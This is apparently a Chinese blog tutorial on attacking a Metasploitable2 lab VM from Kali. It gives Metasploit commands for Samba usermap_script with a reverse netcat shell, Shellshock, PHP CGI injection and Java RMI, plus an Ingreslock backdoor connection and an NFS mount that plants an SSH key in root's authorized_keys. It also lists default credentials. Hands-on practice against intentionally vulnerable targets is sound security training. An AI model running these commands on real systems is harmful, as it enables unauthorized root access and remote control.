摘要:攻击机,成功后可在本地直接输入命令操控对方。在有些脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用漏洞的机会。准备环境靶机系统,。
准备:直接用一个工具包,在虚拟机上直接打开Linux环境。此虚拟机为靶机。
账号:msfadmin 密码:msfadmin
设权限sudo passwd root 改root密码:msfadmin
切换权限:su root 输密码:msfafmin
重启网卡:/etc/init.d/networking restart
xshell连接地址:192.168.1.103(桥接)
一、利用samba 服务漏洞入侵linux主机(samba低版本),对应端口:139、445
靶机IP:192.168.1.103
查看本地服务:netstat -lnt
结合nessus扫描本机的结果出现的漏洞,进行攻击。
攻击机:kali,IP:10.0.0.9
1.msfconsole
search samba
use exploit/multi/samba/usermap_script
set payload cmd/unix/reverse_netcat
show options
set rhosts 192.168.1.103
exploit
成功后可在本地直接输入命令操控对方。
二、CVE-2014-6271 Bash Shellshock(破壳)
Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞,启动Bash的时候,它不但会导入这个函数,而且也会把函数定义后面的命令执行。在有些CGI脚本的设计中,数据是通过环境变量来传递的,这样就给了数据提供者利用Shellshock漏洞的机会。简单来说就是由于服务器的cgi脚本调用了bash命令,由于bash版本过低,攻击者把有害数据写入环境变量,传到服务器端,触发服务器运行Bash脚本,完成攻击。cgi格式文件是“公共网关接口脚本”类型文件。
1.准备环境
靶机:metasploitable2(kali)系统,IP:192.168.1.103。
攻击机:kali,IP:10.0.0.9。
2.靶机上面
cd /usr/lib/cgi-bin/
(创建hello.sh文件:)
sudo nano hello.sh
(ctrl+x退出)(用vim对hello.sh脚本进行编辑:vim hello.sh)
#! /bin/bash
echo "Content-type: text/html"
echo ""
echo "Hello world!"
(:wq保存)
(保存好后,赋予脚本可执行权限,使用chmod命令:)
sudo chmod 755 hello.sh
(通过浏览器访问该脚本,可以看到成功执行,可以攻击)
http://192.168.1.103/cgi-bin/hello.sh
3.进入攻击机msfconsole。
search CVE-2014-6271
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set rhost 192.168.1.103
set targeturi /cgi-bin/hello.sh
exploit
三、PHP CGI漏洞
1.准备环境
靶机:同上
攻击机kali,IP:10.0.0.9。
2.search cve:2012-1823
use exploit/multi/http/php_cgi_arg_injection
show options
set rhost 192.168.1.103
exploit
四、Java RMI SERVER 命令执行漏洞与java cve-2013-0422
nmap –p 0-65535 IP #查看1099端口是否开启
use exploit/multi/misc/java_rmi_server
五、Ingreslock 后门
原理:Ingreslock后门监听1524端口,连接1524端口就可以直接提取root权限。
验证:在本地机上 Telnet 192.168.1.103 1524
六、NFS Exported Share Information Disclosure
rpcinfo -p 192.168.1.103 #显示本地系统中注册到rpcbind协议版本2的所有RPC服务
showmount -e 192.168.1.103 #显示被挂载的共享目录
ssh-keygen #生成密钥
默认密钥保存地址 (/root/.ssh/id_rsa.pub)
mkdir /tmp/test
mount -t nfs 192.168.1.103:/ /tmp/test
cat /root/.ssh/id_rsa.pub>>/tmp/test/root/.ssh/authorized_keys
ssh root@192.168.1.103
相当于远程连接
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/119204.html
摘要:它本身附带数多个已知软件漏洞的专业级漏洞攻击工具。流行的攻击技术包括缓冲区溢出应用程序漏洞攻击,以及利用配置错误等。或是应用在的一种可以防止缓冲区溢出的技术。 一、MSF介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framewo...
摘要:欢迎大家前往腾讯云社区,获取更多腾讯海量技术实践干货哦自从未授权问题获取系统权限的攻击方法的披露后,由于其易用性,利用该问题入侵服务进行挖矿扫描等的黑客行为一直层出不穷而在众多利用该问题入侵服务器进行黑产行为的案例中,其中就存在一类利用该问 欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 自从Redis未授权问题获取Linux系统root权限的攻击方法的披露后,由于其易用性...
摘要:这是执行漏洞利用的语法。同时注意当加载完成时,会显示可用的漏洞利用列表。为了展示可用于此次漏洞利用的选项列表,我们使用模式。可以管理你的会话,而执行实际的载荷分发和漏洞利用工作。杀掉受害者系统的指定进程,使用语法。 第六章 漏洞利用 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 一旦我们完成了漏洞...
摘要:三刷榜僵尸分析应用是主包解密后植入到系统目录的应用,该应用是一款转用于恶意刷榜的病毒,利用用户设备账户信息作为刷榜僵尸,完成对控制端指定应用的恶意刷榜。 作者:逆巴、如凌@阿里聚安全 背景: 随着移动端应用市场数量爆炸式增长,App推广和曝光率也越来越难。哪里有需求哪里就有生财之道,自然,App刷榜也就形成了一条产业链,它能够在短期内大幅提高下载量和用户量,进而提高应用的曝光率。 近期...
摘要:然而,处理器的某些特殊硬件特性能够打破这种保护,使得普通程序在用户态能够直接访问内核空间,直接打破内核空间与用户空间的隔离,修改内核代码,开启上帝模式。假设某台安卓终端拥有内存。至此,上帝模式已经开启。 文/图 阿里安全潘多拉实验室 团控 编者按:团控,阿里安全潘多拉实验室研究人员,该实验室主要聚焦于移动安全领域,包括对iOS和Android系统安全的攻击和防御技术研究。团控的主攻方向...
阅读 2498·2023-04-25 20:43
阅读 2834·2021-11-24 09:38
阅读 1596·2021-09-30 09:54
阅读 1405·2021-09-24 09:47
阅读 2684·2021-09-06 15:02
阅读 872·2021-09-06 15:00
阅读 3380·2021-02-22 17:09
阅读 1046·2019-08-30 15:53